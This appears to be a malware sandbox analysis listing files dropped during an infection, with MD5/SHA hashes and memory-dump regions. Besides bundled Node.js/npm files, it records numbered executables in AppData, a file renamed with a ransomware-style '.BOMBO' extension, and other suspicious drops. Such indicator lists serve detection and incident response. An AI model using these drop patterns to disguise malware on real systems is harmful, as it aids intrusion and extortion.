SHA256 0b99c6a91a40658c75ec7ad8671f02304e93b07bd412e49540b9655f2090e557
SHA512 3b522c95217ca6517197a82d4752d14471c305becb0cb4a516746c4e985e911e07fecd02f3a6e0e9aaef306ab8689a34c05701db1794ad5769bbc760a1353c46

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\writable-browser.js

MD5 817cf252e6005ac5ab0970dd15b05174
SHA1 ac035836aeb22cb1627b8630eba14e2ea4d7f653
SHA256 0d92b48420b6f4ead3c22d6f9db562a232e502e54ca283122fb383828f7b3842
SHA512 8fd9b47fa3dd8c5dae9e65cb98f65f8e69da84a4b152026bd28cc50d1be48590ca9d0c9ce2a2b9b27af318a54204233df36a005442050e922e9450192409d0a7

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\transform.js

MD5 1c9d3713bbc3dbe2142da7921ab0cad4
SHA1 4b1b8e22ca2572e5d5808e4b432d7599352c2282
SHA256 62707b41fa0e51f0556a32f98c7306fa7ff2e76d65df0a614889b827c3f5eaab
SHA512 e582281b62eb5ac45ae039a90f81e97c3c1e81a65caf1c09e355dd2eae05760f254058c5d83dac953271dd8b90ebdb8b1748a10388a23386a9a7e089294a4efd

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\README.md

MD5 f13ecdad6c52fe7ee74b98217316764a
SHA1 c3d7c4bec741e70452f0da911a71307c77d91500
SHA256 42294293978532e3523e7b09172e9da9cc1c0d1bd5d04baf4b9b984ed2088d0d
SHA512 f6664185183bf970c7450e79be5707ea43119dab621583bd61f7080a8b0292845e8f7450836408371dd3ea12ce766af75413464d7082a445e0c29cffe7ff8c75

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\readable.js

MD5 76a193a4bca414ffd6baed6e73a3e105
SHA1 4dbf5e4e8a7223c0f3adf7a0ca8c28bc678292a0
SHA256 cdeb57ca548c8dcf28f9546f202763f9b03e555046476d213d571c6cb7a59a43
SHA512 f30abcb6532c81e6dc3ac10ca408a32df89e0af72cdceabbbf0efecab38bdc5dae6c65f6cf861eb2e9f0ea6c20f1abb24a64989003a0fff16778b7ad2f24fa66

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\readable-browser.js

MD5 dd3f26ae7d763c35d17344a993d5eeb5
SHA1 020ce7510107d1cd16fd15e8abef18fd8dee9316
SHA256 d9c3473b418fbf6103aa34c716fa9d8df7ad1cf5900dac48301dc3e8ea6139ae
SHA512 65103f629bc2c7a36e804e01ad05c7fe4ae8239adad8e7965c6559be20f2c38fe30d4729de950478d4a2184c88f9f9ccba5d0b459742ac33a99f0abb37e42400

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\passthrough.js

MD5 622c2df3803df1939b1ee25912db4454
SHA1 83be571f59074a357bf8fe50b90c4ad21412bd43
SHA256 cfbb763646dda37e1434a5ebc4691fca75b0694b8d89505420ba3d7d489241e6
SHA512 09a74ea5daac0d11883ae003b228784588244c1f4501e5eb41ffcc957c32587d3458e0ada1e56b47c983808fe5f9b8265dcede5a88c6642a5716a1f9a39432ee

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\LICENSE

MD5 d816ace3e00e1e8e105d6b978375f83d
SHA1 31045917a8be9b631ffb5b3148884997b87bd11a
SHA256 b7cd4c543903a138ba70beef889be606adceefa1359f858670d52d1865127e24
SHA512 82c9105602008647c8381bf4996742441fb1c98f5dd91dc85fa0d166686cb1294c47ba18b93da25ee46adf5135a29ab3d0dcadd0a50c6d1e32b5d401b9ca0f9d

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\_stream_writable.js

MD5 31f2f1a4a92b8e950faa990566d9410b
SHA1 3b3f157c3ae828417dd955498f9d065f5b00b538
SHA256 7262ec523f9247b6a75f5e10c5db82e08cfe65acc49f9c96fcb67f68c5a41435
SHA512 c604bb3465ae2e2dea8c8977796a15b76657db0d791d0d67ccf727ad4dd9209efc2fd5ca4a7e15d8931c50d786273d0ae9eadd0c6c5778cac309cb6a81f10a4e

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\_stream_transform.js

MD5 54be917915eb32ae9b4a71c7cc1b3246
SHA1 82a2a3af2ac3e43475ab0e09e6652f4042e12c57
SHA256 75aabc0acf662f0cfa187ea79437b1ca4edac342b6995fe6038d171e719d3613
SHA512 40312c18fea85f62a09e55366230847cb5c7f30535cb123b13f9fc71468278076b325958cc138c57c7958c97a3e98f5500c9da4bc4b1b3edf8aa0519d1e4b955

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\_stream_readable.js

MD5 7bca08c5eeade583afb53df46a92c42b
SHA1 ccc5caa24181f96a1dd2dd9244265c6db848d3f7
SHA256 46ca457378727959f5d2214955c03de665a22c644ddb78c568e925f725ed7e84
SHA512 0ef7813e335cbf06e8963cca10b24a28363284446f0f7bcee7751111e6eb098df6ff286ac6ae9b0f312d11e117e69d19b8d96f47d6566568212b7a5d6eb085b7

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\internal\streams\stream.js

MD5 a391c874badff581abab66c04c4e2e50
SHA1 7b868ed96844e06b284dbc84e3e9db868915203c
SHA256 783e5e798a19dde6981db840cad5a2bfbf0822dd2819fe14c54a1f4e71f0d363
SHA512 cb9ef0ef02515f0a9c6c57fed7e5ed6c9c36cfbe80ad1d4d2554a63e8a4ea106d5b04376a587fe10dca6101474e5890623517bd68558a63d33e0c3569ee62866

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\internal\streams\stream-browser.js

MD5 46b005ecbd876040c07864736861135f
SHA1 c4229c3c10949c67a6cbc9d4c57d3cc1c848edb3
SHA256 0406c41a3dc088c309a3efb822e145bb78856668bd60d16b66b637f4dbf2a1ba
SHA512 533d688ca138bca4610f7a03a80d79ff88d922fda4a230504d698d45ee1c6e4a609f1eeaf8cb073866e9d91963adececc8d00412e85b37706bcca3957c265803

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\internal\streams\destroy.js

MD5 a4607210c0c5e058d5897a6f22ac0a6c
SHA1 11c94e733b2230731ee3cd30c2c081090ffa6835
SHA256 713e5bac5e10b8d0940eda803835c50da6ef1373f1e7b872b063373069129377
SHA512 86e2223c3da2eda2c4fedc2e162bb91fef0c8b6ab0e0f1136b73c8c992f736e6e5d330f2352acbf43b02b9a4d26a8a8ae06c642135ab70b82364dce3e2903871

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\internal\streams\BufferList.js

MD5 99511811073f43563c50a7e7458d200b
SHA1 b131b41c8aa9ae0bfce1b0004525771710bc70a4
SHA256 b404455762369e9df0542e909dbda88df308d53f6abbac0b8f8c0b727e848a74
SHA512 79b64079ef2cc931fb7c333a3438a48b9b0f41aa61087fe2850b050a9d1537a9d410eab3a27d49f1b994ff8e949c488d0f9a8f7f9b1503c1c32b49cca81e85a5

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\GOVERNANCE.md

MD5 b5cdc063fe6b17a632d6108eefec147e
SHA1 ffc13a639880de3c122d467aabb670209cc9542c
SHA256 7366d24a6cd0b904b2a34b7a4c8a8f62fc855605ed0ab4030cbee5a9304f94e7
SHA512 7ff8dab3bb67b5685335b657fcb0b901851ffbd49f25773543e34fd31c81ae19ef62386f06a5e9881428cbfbe29d7ca041558178d73f4f1cbc31cbcc7eaac388

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\duplex.js

MD5 1a2977043a90c2169b60a5991599fc2a
SHA1 27c20fc801b9851e37341ec9730d0fbc9c333593
SHA256 8c1a1af19eaf01f960e9dc5fc35fbcb0e84060d748883866e002b708231b46ac
SHA512 5f233cf6dd4a82365c130daf1902f9deacf7a76999caf01ad8de9308097bb9dd6d9795836419dfbc07e50055915404c720dc1bb5aa28a463ca1117f52c81b614

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\duplex-browser.js

MD5 276ae60048c10d30d8463ac907c2fcec
SHA1 be247923f7e56c9f40905f48dc03c87f0aeb4363
SHA256 bf30af3ba075b80a9eaf05ba5e4e3e331e8a9b304ccb10b7c156aa8075f92f44
SHA512 e3f8c1a038aaf84f0c6b94e2c7fc646844754cc3d951683784182bd90bacc56e0c2f0f1a4be16ea2e5218f44d0f7f6ad00dcec72eb4c0e6eeb4176535587e890

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\gentle-fs\node_modules\iferr\.npmignore

MD5 2e5243fbad9b5b60464b4e0e54e3f30b
SHA1 d644bb560260a56300db7836367d90ac02b0d17c
SHA256 cd429484a9e55b1df61764740f7153c476037c791b9dabac344bcce552a45080
SHA512 a540facc5bcc4eb5bb082bc3b3ce76a3275ebd284ffa1c210ab6e993d5c868c748b2248cb921a3fe449930cb2f16e18120409000e1f916d4abdfd72b77a5799f

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\is-symbol\Makefile

MD5 b8bbbc01d4cbf61a2a5d764e2395d7c9
SHA1 48fa21aa52875191aa2ab21156bb5a20aed49014
SHA256 4586074dc6c5129837eb6cde39a21fc30e251c498e9fcc8fc0c8076a3af97e86
SHA512 ac8ceb376dbc14addca0f63b787ed24989608911fca520ab7ce88a01f0c639cf24e9f3a0bb75e972886a46b1c5715342532817d0bebb6e339d21857b0f1da3d1

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\libnpmteam\.travis.yml

MD5 f51eed7ed699afb51054b11328ea78cf
SHA1 8b68fb74f59a6288ad5c71aee221f7e86c169532
SHA256 fa37bf69fa66e3475a1d499059ff372be0e136e41923c8d6fb407f649a4cb472
SHA512 f7a4ef776fa2e53f46f0b032f0359555422e8729c855b0822cae8f464e49e7f9a453514ce08ec4e5d7a3d02909e40e6771d7bffa1f54ed6f0d2f6ebaeb59b02b

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\libnpx\LICENSE.md

MD5 e9dc66f98e5f7ff720bf603fff36ebc5
SHA1 f2b428eead844c4bf39ca0d0cf61f6b10aeeb93b
SHA256 b49c8d25a8b57fa92b2902d09c4b8a809157ee32fc10d17b7dbb43c4a8038f79
SHA512 8027d65e1556511c884cb80d3c1b846fc9d321f3f83002664ad3805c4dee8e6b0eaf1db81c459153977bdbde9e760b0184ba6572f68d78c37bff617646bcfc3b

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\libnpmteam\appveyor.yml

MD5 c75fff3c7388fd6119578b9d76a598be
SHA1 3b4a13ed37307d560b8b4b631f4debacc7b0d19c
SHA256 8c9537e3c45610f99f3869f6b40a1bfc7c0ae82f72534e9ed0730cd9deb2a4bd
SHA512 9c7d033d70dd8cd360cc5df12bc7bc911fe4c7b626fb1353c3dd6e42d0583f7c0c7f33b3668a90e52dd0c5b4efc87c219005e91513854a98e18138119fd2b0a2

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\libnpmsearch\PULL_REQUEST_TEMPLATE

MD5 06128b3583815726dcdcc40e31855b0d
SHA1 c93f36d2cd32221f94561f1daac62be9ccfb0bc9
SHA256 0d2e3b0d2c6a52197998a5e9345dbb7622e5a8542dcd1ed7d76a5101293d00f0
SHA512 c7babf81f0206223f0da838285871e0ea145c6335575b19d60a52eecaa13f9b6e635bd294a62c8f09d9f52236127ee721814118817775d03a656e67537ebfbec

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\libnpmsearch\LICENSE

MD5 072ac9ab0c4667f8f876becedfe10ee0
SHA1 0227492dcdc7fb8de1d14f9d3421c333230cf8fe
SHA256 2ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013
SHA512 f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013

memory/928-2434-0x000002779E2C0000-0x000002779E2C1000-memory.dmp

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\lodash._baseuniq\LICENSE

MD5 a3a97c2bfdbd1edeb3e95ee9e7769d91
SHA1 3e5fd8699e3990171456a49bba9e154125fd5da1
SHA256 3e0f669f0550e6101efcc81d9032af5498b72eec499df58cfbf63e24a61e2f75
SHA512 7c7d273148f0f3b2e64e16d0164140540a5a02dcb1574a7ec3a53c0ee5acd88810a68e65ea80fd26c1896abab6d65c2b3e738423d44f226cdba1b3dc784512fe

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\lodash._getnative\LICENSE

MD5 26c80e27b277fdd0678be3bd6cd56931
SHA1 148865ccd32e961df8aedd4859840eac4130364a
SHA256 34c9e87365128252851b101ae194a31e3d019724b20c25fa66fd4521a326c818
SHA512 b727fcfb6d09d74fc344f361a5f19e7e679166c5c5bc0666c66fc7599908b3c4aa24f4e4da18948a41ade67d23a908ac27b564b4261ab890a543d8aadb4fc3be

C:\Users\Admin\AppData\Roaming\4.dll

MD5 986d769a639a877a9b8f4fb3c8616911
SHA1 ba1cc29d845d958bd60c989eaa36fdaf9db7ea41
SHA256 c94374155dded12d9f90d16f03470b12b14c4df109a9cf8dbf26e9cd66850457
SHA512 3a1e2a6b57278071906ee2d7b1f9ca6d1ed98084c80512da854e5c1f73e480b92f2b1cceccf87523184bf34250e3cb6a0e1172d7f5478777570f807820d9a187

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\move-concurrently\node_modules\aproba\README.md

MD5 675a05085e7944bc9724a063bc4ed622
SHA1 e1ec3510f824203542cac07fd2052375472a3937
SHA256 da325e3fe4425fc89c9a474ae18eea542f5787151c92bb2aba9dc99de596cfa1
SHA512 a9512b09f95cc79594f29590468197d4deb53fcfc03fd13f3a5b864ca57a5fec6c62879ce32699547ac1d2aae0bbb4d681484e7236d5a804093c788e33d67a61

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\move-concurrently\node_modules\aproba\LICENSE

MD5 9ea8c9dc7d5714c61dfdaedcc774fb69
SHA1 5ea7b44b36946359b3200e48de240fe957ee70f1
SHA256 1b94c9898885c681c1e0ebbf96494e49662842f88ac1e4dd8ffad0ac047108ae
SHA512 0401c416464818fcaadd6e156ce92c28448e990765ddb7d0097b0c30ea9c8a5d862a53a94fd4a0adb502db1e3abe445c08f18e6fcccbb9f70fcbab273a938e60

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\mkdirp\node_modules\minimist\LICENSE

MD5 a6df4eaa6c6a1471228755d06f2494cf
SHA1 b7d2d5450231d817d31b687103065ac090e955ab
SHA256 a9ecf3da3825b3e7232f29c970a2869bb1752c900bd75ba7cbabeb69b8f032b4
SHA512 340a980d3cbe1fae476b27dce893a707b40d8db4c35a3d5cb0e8a907bb8792e06dc50f23ce4abd50a35f18fa74e20caf92e142de4100fb2c5a5e58d5152800b9

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\npm-bundled\LICENSE

MD5 1d7c74bcd1904d125f6aff37749dc069
SHA1 21e6dfe0fffc2f3ec97594aa261929a3ea9cf2ab
SHA256 24b8d53712087b867030d18f2bd6d1a72c78f9fb4dee0ce025374da25e4443b9
SHA512 b5ac03addd29ba82fc05eea8d8d09e0f2fa9814d0dd619c2f7b209a67d95b538c3c2ff70408641ef3704f6a14e710e56f4bf57c2bb3f8957ba164f28ee591778

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\object.getownpropertydescriptors\LICENSE

MD5 e495b6c03f6259077e712e7951ade052
SHA1 784d6e3e026405191cc3878fa6f34cb17f040a4d
SHA256 5836b658b3a29bfc790f472bf6b5a5dfdf08789285c2a50dd43901d5733691db
SHA512 26f124b803587bd76ac1084ccb759a8a82841d2122fa7be671413434df532e4c7c43442d06a4626f134f96a091eb6d09146bcad731c4053552f4079fd5708a63

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\object.getownpropertydescriptors\.editorconfig

MD5 db5ae3e08230f6c6a164bc3747f9863e
SHA1 c02bb3a95537ea2a0ba2f0d3a34fb19e57154399
SHA256 2dc461c2ca14c593ed13101958988e6e5d6944144bb3f8f70631eb96365e9f1e
SHA512 ffd68aaec13ad5910dd5f1c17c7a062d06fffc09db7ab31627fcfd223fa99ec7544103db98e2462b9f2b769984b1dfe1e787dec2814ab1daf465a75320c53a3c

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\pump\LICENSE

MD5 713e86b5fbba64b71263283717ef2b31
SHA1 a96c5d4c7e9d43da53e1a48703e761876453b76c
SHA256 c222d7cd6879fb81d79a019383a6f651107d76f1f75b2632c438828b1a08c227
SHA512 64e4d6383e531446ab4851103f49621fc787c6f506e417e55ab2c1ddb66e3abc3d69edd717f6269169211bf52b632bebe29daa6925b10d3b6fd8d07aa0f87c5f

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\run-queue\node_modules\aproba\index.js

MD5 d7adafc3f75d89eb31609f0c88a16e69
SHA1 974e1ed33c1ea7b016a61b95fed7eccadcf93521
SHA256 8059de4e00e45bad48e09ae5eec5476740b2462fbd913dcc0a055dfa73dd533a
SHA512 b534aa9e922e26448a9c592b98111572074ce50768f8dedd8f1c1449652b8e20997138259ec14bafcc0cba0afaa2e4aab21c6e73c84107472ab946c3ea16d7b9

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\slide\LICENSE

MD5 7428aa9f83c500c4a434f8848ee23851
SHA1 166b3e1c1b7d7cb7b070108876492529f546219f
SHA256 1fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7
SHA512 c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\tunnel-agent\LICENSE

MD5 781a14a7d5369a78091214c3a50d7de5
SHA1 2dfab247089b0288ffa87c64b296bf520461cb35
SHA256 c3613146372a1d5b88c5215439f22f2ba271c1f6284133bbea37887b078fd5de
SHA512 ce5173d8ebe3d455d204e7471a86c80a98c31c94e632a2c367f342e46942f554beba8729f7fe21e968a0710b4c2d00e5af6fd53306bbef12e93ee66682d709ba

C:\Users\Admin\AppData\Roaming\14.exe

MD5 9acd34bcff86e2c01bf5e6675f013b17
SHA1 59bc42d62fbd99dd0f17dec175ea6c2a168f217a
SHA256 384fef8417014b298dca5ae9e16226348bda61198065973537f4907ac2aa1a60
SHA512 9de65becdfc9aaab9710651376684ee697015f3a8d3695a5664535d9dfc34f2343ce4209549cbf09080a0b527e78a253f19169d9c6eb6e4d4a03d1b31ded8933

C:\Users\Admin\AppData\Roaming\13.exe

MD5 349f49be2b024c5f7232f77f3acd4ff6
SHA1 515721802486abd76f29ee6ed5b4481579ab88e5
SHA256 262d38348a745517600abe0719345c6d17c8705dd3b4d67e7a545a94b9388b60
SHA512 a6c9a96c7738f6408c28b1579009167136ce9d3d68deb4c02f57324d800bce284f5d63a9d589651e8ab37b2ac17bf94e9bd59c63aaa3b66f0891e55ba7d646a0

C:\Users\Admin\AppData\Roaming\15.exe

MD5 d43d9558d37cdac1690fdeec0af1b38d
SHA1 98e6dfdd79f43f0971c0eaa58f18bce0e8cbf555
SHA256 501c921311164470ca8cb02e66146d8e3f36baa54bfc3ecb3a1a0ed3186ecbc5
SHA512 9a357c1bbc153ddc017da08c691730a47ab0ff50834cdc69540ede093d17d432789586d8074a4a8816fb1928a511f2a899362bb03feab16ca231adfdc0004aca

C:\Users\Admin\AppData\Roaming\16.exe

MD5 56ba37144bd63d39f23d25dae471054e
SHA1 088e2aff607981dfe5249ce58121ceae0d1db577
SHA256 307077d1a3fd2b53b94d88268e31b0b89b8c0c2ee9dbb46041d3e2395243f1b3
SHA512 6e086bea3389412f6a9fa11e2caa2887db5128c2ad1030685e6841d7d199b63c6d9a76fb9d1ed9116afd851485501843f72af8366537a8283de2f9ab7f3d56f0

C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems32.dll.id-C13A8C73.[[email protected]].BOMBO

MD5 dcfc14553c40a428e9e2437090e3c170
SHA1 20ca93badd8b2fd69e4d8ee06b79405584e945e1
SHA256 f47dd2857e3f94e7c4e66db044583b3de23eccb912e341c38a00193ae02c06a9
SHA512 4041d68334372093706f9dadb8f15184324ef2b71dc8f0984c466574b11e281e684d774385e45e62149ae4d2772d49b68e729ff6a3d15ffdaf2e09136c8c84b5

C:\Users\Admin\AppData\Roaming\17.exe

MD5 15a05615d617394afc0231fc47444394
SHA1 d1253f7c5b10e7a46e084329c36f7692b41c6d59
SHA256 596566f6cb70d55b1b0978a0fab4cffd5049559545fe7ee2fa3897ccbc46c013
SHA512 6deea7c0c3795de7360b11fa04384e0956520a3a7bf5405d411b58487a35bba51eaca51c1e2dda910d4159c22179a9161d84da52193e376dfdf6bdfbe8e9f0f1

C:\Users\Admin\AppData\Roaming\18.exe

MD5 bf15960dd7174427df765fd9f9203521
SHA1 cb1de1df0c3b1a1cc70a28629ac51d67901b17aa
SHA256 9187706072f008a27c26421791f57ec33a59b44b012500b2db3eeb48136fb2da
SHA512 7e8b9907233234440135f27ad813db97e20790baf8cb92949ae9185fa09cb4b7b0da35b6da2b33f3ac64a33545f32f959d90d73f7a6a4f14988c8ac3fd005074

memory/6352-6159-0x00000000002A0000-0x000000000030E000-memory.dmp

memory/6352-6160-0x0000000004BC0000-0x0000000004C12000-memory.dmp

memory/6352-6161-0x0000000004B70000-0x0000000004BB0000-memory.dmp

C:\Users\Admin\AppData\Roaming\19.exe

MD5 ff96cd537ecded6e76c83b0da2a6d03c
SHA1 ec05b49da2f8d74b95560602b39db3943de414cb
SHA256 7897571671717742304acde430e5959c09fd9c29fbbe808105f00a1f663927ac
SHA512 24a827fda9db76c030852ef2db73c6b75913c9ee55e130a3c9a7c6ff7aff0fb7192ff1c47cd266b91500a04657b2da61a5fc00e48e7fbc27a6cbc9b7d91daa4b

C:\Users\Admin\AppData\Roaming\20.exe

MD5 ddcdc714bedffb59133570c3a2b7913f
SHA1 d21953fa497a541f185ed87553a7c24ffc8a67ce
SHA256 be3e6008dde30cb959b90a332a79931b889216a9483944dc5c0d958dec1b8e46
SHA512 a1d728751490c6cf21f9597c6df6f8db857c28d224b2d03e6d25ce8f17557accbd8ef2972369337b9d3305d5b9029001e5300825c23ce826884dcee55b37562c

C:\Users\Admin\AppData\Roaming\21.exe

MD5 9a7f746e51775ca001efd6ecd6ca57ea
SHA1 7ea50de8dd8c82a7673b97bb7ccd665d98de2300
SHA256 c4c308629a06c9a4af93fbd747ed2421e2ff2460347352366e51b91d19737400
SHA512 20cd6af47a92b396ae565e0a21d3acaa0d3a74bcdccc1506a55dea891da912b03256ba9900c2c089fe44d71210e3c100ba4601cf4d6c9b492a2ce0d323d4c57f

C:\Users\Admin\AppData\Roaming\22.exe

MD5 48e9df7a479e3fd63064ec66e2283a45
SHA1 a8dcce44de655a97a3448758b397a37d1f7db549
SHA256 c7d8c3c379dcc42fa796b07b6a9155826d39cbd2f264bc68d22a63b17c8ef7df
SHA512 6cc839f118cad9982ec998665b409dc297a8cff9b23ec2a9105d15cf58d9adbf46d0048dda76c8e1574f6288d901912b7de373920b68b53dbda43d6075611016

memory/10448-17134-0x00000000002A0000-0x0000000000424000-memory.dmp

memory/10448-17807-0x0000000004D10000-0x0000000004D16000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpF6F3.tmp

MD5 2aa8900e91131f181c04da07de96d3fd
SHA1 919a93896f50cf1bf0c482c76b4dc1019eab0955
SHA256 8bada7f1857292effa7f25f0ef5eb8d5ab74b02874e9decf025b945ab034591c
SHA512 92cf2eb20e8ffde9d2f1add28eb5a79d5a3ed14e8953be0c5be41259077aee24c380e18e80e194b22ff8f0013aee2319b03d888af38996351b215cb46344973e

C:\Users\Admin\AppData\Roaming\23.exe

MD5 0dca3348a8b579a1bfa93b4f5b25cddd
SHA1 1ee1bcfd80cd7713093f9c053ef2d8c2cd673cd7
SHA256 c430a15c1712a571b0cd3ed0e5dfeefa7e78865a91bdc12e66666cd37c0e9654
SHA512 f0a17a940dd1c956f2578ed852e94631a9762fdd825ed5160b3758e427e8efa2ff0bfc83f239976b1d2765fefc8f9182e41c2da8f5746b36d4b7d189cb14a1b8

memory/10448-19966-0x0000000004E40000-0x0000000004FDA000-memory.dmp

C:\Users\Admin\AppData\Roaming\24.exe

MD5 43728c30a355702a47c8189c08f84661
SHA1 790873601f3d12522873f86ca1a87bf922f83205
SHA256 cecdf155db1d228bc153ebe762d7970bd6a64e81cf5f977343f906a1e1d56e44
SHA512 b2d0882d5392007364e5f605c405b98a375e34dec63be5d16d9fae374313336fa13edbb6b8894334afb409833ffc0dbbc9be3d7b4263bdf5b77dbff9f2182e1e

memory/10448-20195-0x0000000005070000-0x0000000005076000-memory.dmp

memory/10448-20407-0x0000000005410000-0x0000000005476000-memory.dmp

memory/8728-20800-0x0000000000E20000-0x0000000000E8A000-memory.dmp

memory/7480-21505-0x0000000000400000-0x0000000000452000-memory.dmp

memory/8728-23665-0x00000000085C0000-0x0000000008618000-memory.dmp

memory/9152-25047-0x0000000000790000-0x0000000000828000-memory.dmp

memory/7480-28439-0x00000000058D0000-0x00000000058E8000-memory.dmp

memory/12336-29752-0x0000000000400000-0x0000000000452000-memory.dmp

memory/6676-30180-0x0000000004DB0000-0x0000000004DD2000-memory.dmp

memory/9152-30349-0x0000000002AB0000-0x0000000002B12000-memory.dmp

memory/9152-31822-0x0000000006A00000-0x0000000006A56000-memory.dmp

memory/7916-37210-0x0000000000400000-0x0000000000452000-memory.dmp

C:\Users\Admin\AppData\Roaming\J-96T9R9\J-9logrv.ini

MD5 bbc41c78bae6c71e63cb544a6a284d94
SHA1 33f2c1d9fa0e9c99b80bc2500621e95af38b1f9a
SHA256 ee83c6bcea9353c74bfc0a7e739f3c4a765ace894470e09cdcdebba700b8d4cb
SHA512 0aea424b57adae3e14ad6491cab585f554b4dffe601b5a17bad6ee6177d2f0f995e419cde576e2d1782b9bddc0661aada11a2c9f1454ae625d9e3223635ec9f4

memory/3596-39287-0x0000000000400000-0x0000000000450000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg

MD5 bd74a3c50fd08981e89d96859e176d68
SHA1 0a98b96aefe60b96722d587b7c3aabcd15927618
SHA256 ab305218ee0e95fa553885fa52f3a25dcc13b4deade8b7993ccb9f230a272837
SHA512 0704243904abc3691177e34606fe2741945f69cf7ecb898655d98e81b145bf707d20cfa0af01fb3aa1cd170e2f3ce8f625b1612e0fcf5eba01f770617ffc9f1e

memory/11876-39318-0x0000000000400000-0x0000000000452000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Pcllkyiz\oeuul.exe

MD5 3d2c6861b6d0899004f8abe7362f45b7
SHA1 33855b9a9a52f9183788b169cc5d57e6ad9da994
SHA256 dbe95b94656eb0173998737fb5e733d3714c8e3b58226a1a038ca85257c8b064
